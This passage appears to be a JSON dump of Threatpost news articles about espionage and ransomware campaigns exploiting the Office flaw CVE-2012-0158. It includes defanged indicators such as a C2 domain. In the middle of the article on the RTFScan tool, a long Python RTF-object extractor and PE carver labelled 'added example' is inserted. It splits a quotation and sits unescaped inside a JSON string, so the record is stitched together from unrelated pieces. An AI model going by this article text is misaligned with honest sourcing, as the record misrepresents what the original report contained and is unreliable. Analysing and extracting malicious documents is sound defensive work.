Specific targets are chosen in these campaigns, and those targets are phished with convincing messaging, such as a negative customer service review as in one attack spotted by Cylance.\n\nThe platform has been around for a few years and can be used to steal not only system and network information, but documents and credentials, in addition to opening a backdoor connection to the attacker in order to move stolen data.\n\n\u201cIt\u2019s more of an extensible platform to where they can add in any functionality they want as a plug-in. It\u2019s more of an infection framework than any specific Trojan,\u201d Gross said. \u201cThey can modify the components over time and not have to really worry about it if the main component is never detected. This is more like an extensible platform where they add in functionality, screen capture, key logging, they just send it up as a plug in.\u201d\n\nCVE-2012-0158, meanwhile, has been a favorite among nation-state attackers seeking to infiltrate corporations or activist groups for espionage or surveillance. It was detected in the [Icefog](<http://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417>) and [NetTraveler](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>) campaigns discovered by Kaspersky Lab. Both were linked to operatives in China and follow similar patterns as GTA Panda in that they\u2019re attacking both activists and manufacturing companies.\n\n\u201cWe see a lot of people who are attacking industries, also attacking human rights groups. We\u2019ve always thought it just comes down as a directive from whomever to test this against them,\u201d Gross said. \u201cWe see a lot of new malware tested against human rights activists before it ever makes its way to the corporate environments. 
The original stuff I found was not targeted against human rights, but as I dug into it, I saw more and more stuff that was also additionally targeting human rights; and that was older stuff before they moved on to corporations.\u201d\n\n[NetTraveler](<http://threatpost.com/nettraveler-variant-adds-java-exploits-watering-hole-attacks-to-bag-of-tricks/102156>), for example, made use of the CVE-2012-0158 Office exploits to target the Uyghur and Tibetan activists, before moving on to oil and energy companies as well as diplomats and government agencies around the world.\n\n\u201cIt\u2019s kinda like a Darwinian evolution of malware. If it passes the first test, it\u2019s survival of the fittest. The things that don\u2019t get detected get reused,\u201d Gross said. \u201cHuman rights are almost like a playground. They\u2019re always a target, and we see a lot of malware that\u2019s used against them before anyone else.\u201d\n\nAs for the platform, its staying power is due to its stealth.\n\n\u201cThe big thing is moving functionality out of the actual files that get loaded into [victims\u2019 machines] because then it doesn\u2019t look suspicious until that file subsequently loads something else that performs the malicious activity,\u201d Gross said. \u201cThe malicious components are sitting there encrypted on disk, where your typical security product is not going to find that unless they already know about it.\u201d\n\nThere are also layers of encryption protecting the attack that shield it from detection, Gross said. As for the exploits, lax patching is likely the biggest culprit; in this case, CVE-2012-0158 was patched more than 18 months ago by Microsoft. 
Combine that with effective social engineering in the phishing messaging\u2014in particular from spoofed, trusted email addresses\u2014and that\u2019s a potent cocktail for trouble.\n\n\u201cIf you get emails that look like they\u2019re coming from trusted parties and people you usually communicate with, then our guard drops and we\u2019re much more likely to say OK, I\u2019ll open that,\u201d Gross said. \u201cI think they rely on that really heavily, especially with the activist community because they know all these people and they know who they communicate with on a regular basis and they try to make it look like it comes from them. Their guard\u2019s totally down and they\u2019re not worried about it.\u201d\n", "cvss3": {}, "published": "2013-11-25T10:26:50", "type": "threatpost", "title": "Grand Theft Auto Panda APT Espionage Attack Platform", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-11-27T20:28:16", "id": "THREATPOST:440B0C9A3453F28AD6AABD6CD97AA074", "href": "https://threatpost.com/extensible-attack-platform-has-familiar-feel/103021/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:38", "description": "Never let it be said that attackers don\u2019t keep up with the news. The crew behind the [NetTraveler cyberespionage attacks](<https://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/>) is now using the news about the NSA\u2019s PRISM surveillance program as bait in a new spear-phishing campaign.\n\nSecurity researcher Brandon Dixon of 9bplus came across a malicious email this week that plays off the recent spate of news stories about the leaked data on the National Security Agency\u2019s PRISM program, which is designed to gather data on users from a variety of large Internet companies, reportedly including Microsoft, Apple, Google and others. 
The email is designed to look like it was sent by Jill Kelley, the woman who helped expose the affair that David Petraeus was having.\n\nDixon said that the message was targeted at someone involved with the Regional Tibet Youth Congress in India and included a malicious Word document that had many of the earmarks of the tactics used by the NetTraveler attackers.\n\n\u201cThe attachment is a Word document labeled \u2018Monitored List 1.doc\u2019, exploiting the always favored CVE-2012-0158 and can be tied back to the same actors involved in the [NetTraveler campaigns](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/22105818/kaspersky-the-net-traveler-part1-final.pdf>) brought to light by Kaspersky. It\u2019s funny to note that these actors are keeping up with their same techniques and infrastructure (not all of it) despite being 100% outed. Again, this sort of behavior shows poor operational security or a complete lack of care,\u201d Dixon wrote in his [analysis of the email](<http://blog.9bplus.com/prism-lure-in-use-by-nettraveler-attackers/>).\n\nThe text of the email is crammed with somewhat nonsensical text mentioning the [NSA PRISM program](<https://threatpost.com/always-outmanned-always-outgunned/>), Edward Snowden, the former NSA contractor responsible for the leaks, and the CIA. Once the malicious Word document is opened on a target machine, it writes several files to the hard drive, including one named \u201cdw20.exe\u201d, which has been seen in use by the NetTraveler crew in the past. Dixon said he wasn\u2019t able to identify the IP address or command and control server associated with the email campaign, but he believes there are likely additional emails out there like the one he found.\n\n\u201cWhatever the domain or IP address used in the attack is, you can be sure that there will be other emails and malicious documents like it. 
The NetTraveler attackers have been going strong since 2007-2008 and I doubt they will be stopping anytime soon,\u201d Dixon said.\n\nKurt Baumgartner, a security researcher at Kaspersky Lab who did some of the original research on the NetTraveler campaign, said the group behind the attacks is oddly incautious in its tactics.\n\n\u201cThese groups are surprisingly bold. Not only did we see this group maintain backdoors on their victim systems alongside Red October backdoors, but the NetTraveler infrastructure continues to be in active use even after the operation has moved out of the shadows and into the public light,\u201d he said.\n\n_Image from Flickr photos of [LadyDragonflyCC](<https://secure.flickr.com/photos/ladydragonflyherworld/>). _\n", "cvss3": {}, "published": "2013-06-18T10:00:42", "type": "threatpost", "title": "NetTraveler Attackers Using PRISM Program as Bait", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2018-03-22T14:58:21", "id": "THREATPOST:849E78B2F5C0D699337829FD6D6F8AE4", "href": "https://threatpost.com/nettraveler-attackers-using-nsa-prism-program-as-bait/101006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:15", "description": "Exploits embedded inside documents such as Word files, PDFs and Excel spreadsheets have been at the core of many targeted attacks during the past 24 months. Detection of these attack methods is improving and nimble hackers are recognizing the need for new avenues into enterprise networks. 
Some have been finding success using rich text format (RTF) files to spread malware that exploits Office vulnerabilities.\n\nResearcher Mila Parkour reported in June she\u2019d collected 90 RTF files over the course of three months, many with China-related file names and many [targeting specific industries](<http://contagiodump.blogspot.com/2012/06/90-cve-2012-0158-documents-for-testing.html>). All of them were exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a [vulnerability in the ActiveX controls within MSCOMCTL.OCX](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>), the Microsoft Common Controls library, an ActiveX (OLE) component that can be embedded in documents and other files and that Microsoft patched in bulletin MS12-027. A successful exploit lets a remote attacker execute arbitrary code when the victim opens a crafted web page, Office document or RTF file.\n\n\u201cMany believe RTF is a relatively safe format, just as it was back in the day when people might not trust Word docs and would send PDFs around instead. Today, we chuckle at that,\u201d said Lenny Zeltser, a handler at the SANS Internet Storm Center. \u201cToday, Word and PDF documents are risky and people are sending RTF files. We can now see attackers finding ways to use RTF files in exploits.\u201d\n\nSome of the samples in the wild have been fairly sophisticated and difficult to examine, Zeltser said. Some, for example, have contained embedded portable executable files that are a challenge to find and extract without some heavy manual lifting. German security researcher Frank Boldewin, keeper of the [OfficeMalScanner toolkit](<http://reconstructer.org/main.html>), is among those recognizing this new trend. He updated the popular, freely available tool with RTFScan, which can help identify RTF-based exploits and extract embedded artifacts for examination.\n\n\u201cThe tool is fantastic for analyzing malicious RTF files,\u201d Zeltser said. 
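The extraction step that RTFScan automates is easy to misjudge from the description alone, so here is an added example (not RTFScan, and not code from the article or from Boldewin's toolkit) of the same core idea in Python: locate every `{\*\objdata ...}` group in an RTF file, strip the whitespace and stray control words attackers use to break up the hex stream, decode it, read the OLE 1.0 object header that precedes the embedded data, and carve any MZ/PE executable out of the native data. The OLE 1.0 header layout used here (OLEVersion, FormatID, three length-prefixed ANSI strings, then NativeDataSize for embedded objects) is the one documented in Microsoft's MS-OLEDS; the sample RTF, its `Package` class name and the stub "executable" are constructed for the demo and stand in for the real droppers described on this page. The same walk applies to the RTF droppers in the Transparent Tribe and COVID-19 campaigns covered below.

```python
# Added example: minimal RTF \objdata extractor and PE carver (not RTFScan).
# Assumptions are labelled; the sample RTF and stub PE are constructed here.
import re
import struct

OLE_CFB_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'   # OLE compound file header


def rtf_group_body(text, start):
    '''Return (body, end) for the RTF group whose opening brace is at start.
    Backslash escapes (\\{ \\} \\\\) are skipped so they do not affect nesting.'''
    depth, i, n = 0, start, len(text)
    while i < n:
        c = text[i]
        if c == '\\':          # escaped char or start of a control word
            i += 2
            continue
        if c == '{':
            depth += 1
        elif c == '}':
            depth -= 1
            if depth == 0:
                return text[start + 1:i], i + 1
        i += 1
    raise ValueError('unbalanced RTF group')


def objdata_blobs(rtf):
    '''Yield the decoded bytes of every {\\*\\objdata ...} group.  Tolerates hex
    split across lines, interleaved whitespace and stray control words, which
    are common obfuscations. Simplification: \\'hh escapes are not decoded.'''
    for m in re.finditer(r'\{\\\*?\\objdata(?![a-zA-Z])', rtf):
        body, _ = rtf_group_body(rtf, m.start())
        body = body[m.end() - m.start() - 1:]               # drop the keyword itself
        body = re.sub(r'\\[a-zA-Z]+-?\d* ?', '', body)       # strip control words
        hexdigits = re.sub(r'[^0-9A-Fa-f]', '', body)
        if len(hexdigits) % 2:
            hexdigits = hexdigits[:-1]                        # ignore a dangling nibble
        yield bytes.fromhex(hexdigits)


def parse_ole1(blob):
    '''Parse the OLE 1.0 ObjectHeader (layout per MS-OLEDS, assumed here):
    OLEVersion, FormatID, ClassName/TopicName/ItemName as length-prefixed ANSI
    strings; FormatID 2 (EmbeddedObject) is followed by NativeDataSize + data.'''
    off = 0

    def u32():
        nonlocal off
        v, = struct.unpack_from('<I', blob, off)
        off += 4
        return v

    def lp_string():
        nonlocal off
        n = u32()
        s = blob[off:off + n]
        off += n
        return s.rstrip(b'\x00').decode('latin-1')

    try:
        version, format_id = u32(), u32()
        classname = lp_string()
        lp_string()            # TopicName
        lp_string()            # ItemName
        native = None
        if format_id == 2:     # EmbeddedObject
            size = u32()
            native = blob[off:off + size]
        return {'version': version, 'format_id': format_id,
                'classname': classname, 'native': native}
    except struct.error:       # truncated or not an OLE 1.0 header
        return None


def carve_pe(data):
    '''Find MZ headers whose e_lfanew points at a PE signature; return
    a list of (offset, carved_bytes).'''
    found = []
    for m in re.finditer(b'MZ', data):
        mz = m.start()
        if mz + 0x40 > len(data):
            continue
        e_lfanew, = struct.unpack_from('<I', data, mz + 0x3C)
        pe = mz + e_lfanew
        if data[pe:pe + 4] == b'PE\x00\x00':
            found.append((mz, data[mz:]))
    return found


def scan_rtf(rtf):
    '''One report entry per embedded object: class name, OLE compound file
    or not, size of native data, and offsets of any carved executables.'''
    report = []
    for blob in objdata_blobs(rtf):
        hdr = parse_ole1(blob) or {'classname': None, 'format_id': None, 'native': None}
        native = blob if hdr['native'] is None else hdr['native']
        report.append({'classname': hdr['classname'], 'format_id': hdr['format_id'],
                       'is_cfb': native.startswith(OLE_CFB_MAGIC),
                       'native_size': len(native),
                       'pe_offsets': [off for off, _ in carve_pe(native)]})
    return report


def fake_pe():
    '''Constructed stand-in for an embedded executable: a DOS header whose
    e_lfanew points at a PE signature and a zeroed COFF header. Not runnable.'''
    dos = bytearray(0x40)
    dos[0:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 0x40)
    return bytes(dos) + b'PE\x00\x00' + b'\x4c\x01' + b'\x00' * 18


def build_sample_rtf():
    '''Constructed malicious-looking RTF: an OLE 1.0 EmbeddedObject of class
    Package wrapping fake_pe(), hex-encoded and broken up with newlines and a
    stray control word the way real droppers are.'''
    def lp(s):
        b = s.encode('latin-1') + b'\x00'
        return struct.pack('<I', len(b)) + b
    native = fake_pe()
    payload = (struct.pack('<II', 0x0501, 2) + lp('Package') + lp('') + lp('')
               + struct.pack('<I', len(native)) + native)
    chunks = [payload.hex()[i:i + 16] for i in range(0, len(payload.hex()), 16)]
    objdata = ' \n'.join(chunks[:3]) + '\\v0 ' + '\n'.join(chunks[3:])
    return ('{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Package}'
            '{\\*\\objdata ' + objdata + '}}\\par}')


if __name__ == '__main__':
    for entry in scan_rtf(build_sample_rtf()):
        print(entry)
```

To run it against a real sample, read the file as `latin-1` text (RTF is byte-oriented) and pass the string to `scan_rtf`; a carved blob from `carve_pe` can then be written to disk for static analysis or detonation. The parser deliberately does not try to identify the vulnerable control by CLSID: the point of the extraction is that whatever sits in the object data, encoded however the attacker likes, ends up as bytes an analyst can inspect.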
\u201cAttackers are using more sophisticated ways of concealing artifacts in RTF files, which makes them harder to examine. The tool is designed to help a trained security analyst figure out the nature of the file, and if it\u2019s exploited, what happens next.\u201d\n\nIn one example posted on the ISC Diary today, [RTFScan was able to find an embedded OLE object](<https://isc.sans.edu/diary/Analyzing+Malicious+RTF+Files+Using+OfficeMalScanner+s+RTFScan/14092>) that carried the attacker\u2019s shellcode, which runs once a vulnerable version of Word parses the object, Zeltser wrote. RTFScan was able to get around the obfuscation in place and extract the malicious embedded executable.\n\n\u201cRTFScan tells you where to find the shellcode, extract it and turn it into a Windows executable,\u201d he said. \u201cThis would allow an analyst to debug it and observe what happens after it executes, how the malware behaves. This is very important for analysts because the frequency of using Microsoft Office docs continues to be very common. 
The number of attacks is not shrinking and attackers find all sorts of techniques to deliver payloads with the help of Word, PDF, Excel and now RTF documents.\u201d\n", "cvss3": {}, "published": "2012-09-14T17:25:21", "type": "threatpost", "title": "Tool Scans for RTF Files Spreading Malware in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-04-17T16:31:32", "id": "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "href": "https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/77014/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:42", "description": "Diplomats and military personnel in India have been victimized in targeted espionage attacks that use a number of means of infection including phishing and watering hole sites.\n\nResearchers at Proofpoint this week published a report on [Operation Transparent Tribe](<https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf>), which was ongoing as of Feb. 11 when Proofpoint uncovered live attacks against Indian diplomats operating in embassies in Saudi Arabia and Kazakhstan. Proofpoint found IP addresses in Pakistan involved in the attacks, which involved an elaborate network of watering hole websites and multiple phishing email campaigns.\n\nThe sustained campaign\u2019s goal, Proofpoint said, was to drop a remote access Trojan it calls MSIL/Crimson. 
The Trojan had a variety of data exfiltration functions, including access to laptop cameras, screen capture functionality and keylogging.\n\nKevin Epstein, VP of the threat operations center at Proofpoint, told Threatpost that uncovering nation-state cyber espionage is one thing, but being able to expose it as it is happening is rare.\n\n\u201cThis is a multi-year and multi-vector campaign clearly tied to state sponsored espionage,\u201d he said. \u201cIn the world of crimeware, you rarely see this type of complexity. A nation state using multiple vectors, that\u2019s significant.\u201d\n\nHacking has become an increasingly popular and effective weapon in geopolitical conflicts, Epstein said. Groups with ties to most major powers are increasingly using targeted attack campaigns for political and competitive advantage and as a way to perpetrate attacks on critical infrastructure.\n\nEpstein said that typically security analysts only get wind of past campaigns that offer limited insight into pieces of the attack puzzle. With this recent discovery, he said, Proofpoint was able to identify all aspects of the campaign as it was being carried out.\n\n\u201cThis was an elaborate advanced persistent threat that required setting up multiple websites, multiple registrations, a build-out of full content sites and hosting sites,\u201d Epstein said.\n\nOne attack vector was email attachments carrying weaponized RTF documents that exploited the four-year-old [CVE-2012-0158 Microsoft ActiveX vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) to drop an embedded, encoded portable executable.\n\n\u201cMSIL/Crimson is a logical extension of existing malware. This discovery is less about the bits and bytes of a specific malware,\u201d Epstein said.\n\nMSIL/Crimson, Epstein said, is a stealthy package of exploits. After successful exploitation and decoding of the embedded payload, MSIL/Crimson will be executed on the victim\u2019s machine. 
The first stage in infection is a downloader whose purpose is to download the more fully featured remote access Trojan component, he said.\n\nOther attack vectors for MSIL/Crimson included fake blogs and news websites that contained links to malicious payloads via text and image hyperlinks and desirable files that contained MSIL/Crimson.\n\n\u201cThese were sites that generated content that was designed to interest people in the armed forces,\u201d Epstein said. \u201cThe attackers used topical and original content compelling enough to entice readers to share stories, links and downloads with others in the armed services.\u201d\n\nIn Proofpoint\u2019s analysis of the MSIL/Crimson it wrote: \u201cMany of the campaigns and attacks appear related by common IOCs, vectors, payloads, and language, although the exact nature and attribution associated with this advanced persistent threat remains under investigation.\u201d\n", "cvss3": {}, "published": "2016-03-04T17:35:42", "type": "threatpost", "title": "Proofpoint Warns Of New MSIL/Crimson Tied To Cyber Espionage", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2016-03-10T14:44:44", "id": "THREATPOST:0B96DF7B8D0B80F9F8340D753646049C", "href": "https://threatpost.com/espionage-malware-watering-hole-attacks-target-diplomats/116600/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:14", "description": "Chinese president Xi Jinping is supposed to have dinner this evening with U.S. president Barack Obama. Wonder if the name Ge Xing will come up?\n\nGe Xing is the subject of a joint [report](<http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf?t=1443030820943&submissionGuid=81f1c199-859f-41e9-955b-2eec13777720>) published this morning by ThreatConnect and Defense Group Inc., computer and national security service providers respectively. 
Ge is alleged to be a member of the People\u2019s Liberation Army unit 78020, a state-sponsored hacking team whose mission is to collect intelligence from political and military sources to advance China\u2019s interests in the South China Sea, a key strategic and economic region in Asia with plenty of ties to the U.S.\n\nThe report connects PLA 78020 to the Naikon advanced persistent threat group, a state-sponsored outfit that has followed the APT playbook to the letter to infiltrate and steal sensitive data and intellectual property from military, diplomatic and enterprise targets in a number of Asian countries, as well as the United Nations Development Programme and the Association of Southeast Asian Nations (ASEAN).\n\nControl over the South China Sea is a focal point for China; through this region flows trillions of dollars of commerce and China has not been shy about claiming its share of the territory. The report states that China uses its offensive hacking capabilities to gather intelligence on adversaries\u2019 military and diplomatic intentions in the regions, and has leveraged the information to strengthen its position.\n\n\u201cThe South China Sea is seen as a key geopolitical area for China,\u201d said Dan Alderman, deputy director of DGI. \u201cWith Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.\u201d\n\nThe report is just the latest chess piece hovering over Jinping\u2019s U.S. visit this week, which began in earnest yesterday with a visit to Seattle and meetings with giant technology firms such as Microsoft, Apple and Google, among others. 
Those companies want to tap into the growing Chinese technology market and the government there is using its leverage to get them to support stringent Internet controls imposed by the Chinese government.\n\nAccording to a _[New York Times](<http://www.nytimes.com/2015/09/17/technology/china-tries-to-extract-pledge-of-compliance-from-us-tech-firms.html>)_ report last week, a letter sent to American technology companies this summer asked them to store Chinese user data in China. China also reportedly asked that U.S.-built software and devices sold in China be \u201csecure and controllable,\u201d which likely means the Chinese would want backdoor access to these products, or access to private encryption keys.\n\nJinping, meanwhile, tried to distance himself from the fray when he said in a _Wall Street Journal_ interview: \u201cCyber theft of commercial secrets and hacking attacks against government networks are both illegal; such acts are criminal offences and should be punished according to law and relevant international conventions.\u201d\n\n_Journal_ reporter [Josh Chin connected with Ge Xing over the phone](<http://www.wsj.com/articles/cyber-sleuths-track-hacker-to-chinas-military-1443042030>) and Ge confirmed a number of the dots connected in the report before hanging up on the reporter and threatening to report him to the police. While that never happened, the infrastructure connected to Ge and this slice of the Naikon APT group was quickly shut down and taken offline.\n\nIn May, researchers at Kaspersky Lab published a report on [Naikon](<https://securelist.com/analysis/publications/69953/the-naikon-apt/>) and documented five years of activity attributed to the APT group. It describes a high volume of [geo-politically motivated attacks](<https://securelist.com/blog/research/70029/the-naikon-apt-and-the-msnmm-campaigns/>) with a high rate of success infiltrating influential organizations in the region. 
The group uses advanced hacking tools, most of which were developed externally and include a full-featured backdoor and exploit builder.\n\nLike most APT groups, they craft tailored spear phishing messages to infiltrate organizations, in this case a Word or other Office document carrying an exploit for CVE-2012-0158, a long-time favorite of APT groups. The vulnerability is a buffer overflow in the ListView and TreeView ActiveX controls of MSCOMCTL.OCX, the Windows Common Controls library. The exploit installs a remote administration tool, or RAT, on the compromised machine that opens a backdoor through which stolen data is moved out and additional malware and instructions can be moved in.\n\nChin\u2019s article describes a similar attack initiated by Ge, who is portrayed not only as a soldier, but as an academic. The researchers determined through a variety of avenues that Ge is an active member of the military, having published research as a member of the military, in addition to numerous postings to social media as an officer and via his access to secure locations believed to be headquarters to the PLA unit\u2019s technical reconnaissance bureau.\n\n\u201cDoing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group\u2019s activity,\u201d said Rich Barger, CIO and cofounder of ThreatConnect. \u201cWe\u2019ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Looking at this from a technical lens only gives you so much. 
When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.\u201d\n\nThe report also highlights a number of operational security mistakes Ge made to inadvertently give himself away, such as using the same handle within the group\u2019s infrastructure, even embedding certain names in families of malware attributed to them. All of this combined with similar mistakes made across the command and control infrastructure and evidence pulled from posts on social media proved to be enough to tie Ge to the Naikon group and elite PLA unit that is making gains in the region.\n\n\u201cIf you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,\u201d Barger said. \u201cYou don\u2019t influence what they\u2019re influencing in the region if you don\u2019t have the intel support capabilities fueling that operational machine.\u201d\n", "cvss3": {}, "published": "2015-09-24T13:37:36", "type": "threatpost", "title": "China PLA Unit 78020 Cyberespionage Naikon APT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2015-09-25T13:01:29", "id": "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "href": "https://threatpost.com/naikon-apt-group-tied-to-chinas-pla-unit-78020/114798/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-15T20:07:18", "description": "Recent malware campaigns reveal that cybercriminals aren\u2019t sparing healthcare firms, medical suppliers and hospitals on the frontlines of the coronavirus pandemic.\n\nResearchers have shed light on two recently uncovered malware campaigns: one targeting a Canadian government healthcare organization and a Canadian medical research university, and the other 
hitting medical organizations and medical research facilities worldwide.\n\nThe emails sent to these unnamed organizations purported to send COVID-19 medical supply data, critical corporate communications regarding the virus or coronavirus details from the World Health Organization (WHO) \u2013 but actually aimed to distribute ransomware, infostealer malware and more.\n\nThese recent campaigns are the tip of the iceberg when it comes to cybercrime targeting organizations in the healthcare space, researchers said. \u201cDespite prior reporting by various sources indicating that some cyber-threat attacker activity may subside in some respects during the COVID-19 pandemic, Unit 42 has observed quite the opposite with regard to COVID-19 themed threats, particularly in the realm of phishing attacks,\u201d said Adrian McCabe, Vicky Ray and Juan Cortes, security researchers with Palo Alto Networks\u2019 Unit 42 team, [in a Tuesday post.](<https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/>)\n\n**Ransomware Attacks**\n\nBetween March 24 and 30, researchers observed various malicious emails attempting to spread ransomware to several individuals associated with an unnamed Canadian government health organization actively engaged in COVID-19 response efforts, as well as a Canadian university that is conducting COVID-19 research.\n\nThe emails, sent from a spoofed WHO email address (noreply@who[.]int), contained a rich text format (RTF) file that purported to spread information about the pandemic. 
When opened, the RTF file exploits a known vulnerability ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>)) in the MSCOMCTL.OCX ActiveX controls shipped with Microsoft Office, which allows attackers to execute arbitrary code, and uses it to deliver a ransomware payload.\n\nThe malicious attachment drops a ransomware binary to the victim\u2019s disk and then executes it. To avoid detection, the dropped binary has the hidden file attribute set, so it does not appear in normal directory listings. The binary also uses an Adobe Acrobat icon to further cloak its true purpose.\n\nAfter further analysis of the code structure of the binary and the host-based and network-based behaviors, researchers determined that the malware is an open-source [ransomware variant called EDA2](<https://threatpost.com/criminals-peddling-affordable-alphalocker-ransomware/117888/>), which is associated with a larger, parent ransomware family called [HiddenTear.](<https://threatpost.com/low-cost-ransomware-service-discovered/125017/>)\n\nAfter execution, a ransom note is displayed on the victim\u2019s desktop, which states: \u201cIf you want to unlock your files you must sent .35 BTC [Bitcoin] to this address,\u201d and then gives an address for where to send the ransom payment. The ransomware binary then encrypts files with various extensions, including \u201c.DOC\u201d, \u201c.ZIP\u201d, \u201c.PPT\u201d and more. Of note, \u201cthis ransomware binary has a particularly substantial limitation; it is hardcoded to only encrypt files and directories that are on the victim\u2019s desktop,\u201d said researchers.\n\nResearchers said the ransomware samples in this campaign weren\u2019t successful in reaching their intended victims. Other targets haven\u2019t been so lucky, however. 
Despite ransomware gangs [recently pledging that they would stop](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-to-stop-attacking-health-orgs-during-pandemic/>) attacking hospitals in the midst of the pandemic, cyberattacks continue. Several hospitals have been targeted by the Ryuk ransomware, [according to security researcher \u201cPeterM\u201d on Twitter](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1243166479903834112&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D154768%26action%3Dedit>).\n\n> I can confirm that [#Ryuk](<https://twitter.com/hashtag/Ryuk?src=hash&ref_src=twsrc%5Etfw>) ransomware are still targeting \nhospitals despite the global pandemic. I'm looking at a US health care provider at the moment who were targeted overnight. Any HC providers reading this, if you have a TrickBot infection get help dealing with it ASAP.\n> \n> \u2014 PeterM (@AltShiftPrtScn) [March 26, 2020](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112?ref_src=twsrc%5Etfw>)\n\nHammersmith Medicines Research, a London-based healthcare provider that was working with the British government to test COVID-19 vaccines, was also [recently hit by a ransomware attack](<https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus>). 
The Maze ransomware operators, who launched the attack, later posted the stolen data online.\n\n**Malware Attacks**\n\nUnit 42 researchers also spotted a separate campaign targeting various organizations, including medical organizations and medical research facilities located in Japan and Canada, with the [AgentTesla malware](<https://threatpost.com/malware-steals-info-with-advanced-obfuscation/150280/>).\n\nOther targets of this campaign (all unnamed) include a United States defense research entity, a Turkish government agency managing public works, a German industrial manufacturing firm and a Korean chemical manufacturer.\n\nThe malspam emails used the coronavirus as a lure, with a malicious attachment pretending to be a \u201cCOVID-19 Supplier Notice\u201d or a \u201cCorporate advisory\u201d for coronavirus.\n\nThe email address sending the malspam emails, \u201cShipping@liquidroam[.]com,\u201d uses the legitimate business domain of LiquidRoam, which sells electric skateboards. This led researchers to conclude that the domain has been compromised and that the infrastructure is being used by cybercriminals.\n\nThe attachments for the emails were actually droppers delivering variants of the AgentTesla malware family. AgentTesla, [an info-stealing malware](<https://threatpost.com/advanced-obfuscation-info-stealing-campaign/152468/>) that has been around since 2014, is sold in multiple forums commonly visited by cybercriminals, and is one of the top malware families of choice of the SilverTerrier threat actor, known for business email compromise (BEC) campaigns.\n\n\u201cAll the associated samples connected to the same C2 domain for exfiltration: \u2018ftp[.]lookmegarment[.]com,\u2019\u201d researchers said. 
\u201cOur analysis also shows that the AgentTesla samples had hard-coded credentials used to communicate with the C2 over FTP.\u201d\n\nAttackers continue to leverage [coronavirus-themed cyberattacks](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) as panic around the global pandemic continues \u2013 including [malware attacks](<https://threatpost.com/coronavirus-propagate-emotet/152404/>), booby-trapped URLs and credential-stuffing scams.\n\n\u201cIt is clear from these cases that the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are on the front lines and responding to the pandemic on a daily basis,\u201d said Unit 42 researchers.\n", "cvss3": {}, "published": "2020-04-14T16:07:07", "type": "threatpost", "title": "Cyberattacks Target Healthcare Orgs on Coronavirus Frontlines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2020-04-14T16:07:07", "id": "THREATPOST:FF75AF79B23F8B0D0CF546FC055B7911", "href": "https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:59:07", "description": "Hold off on the notion that [watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/77647>) may supplant [phishing as the initial means of compromise](<http://threatpost.com/spear-phishing-remains-preferred-point-entry-targeted-persistent-attacks-113012/77267>) in advanced attacks. A number of recent targeted campaigns have used the 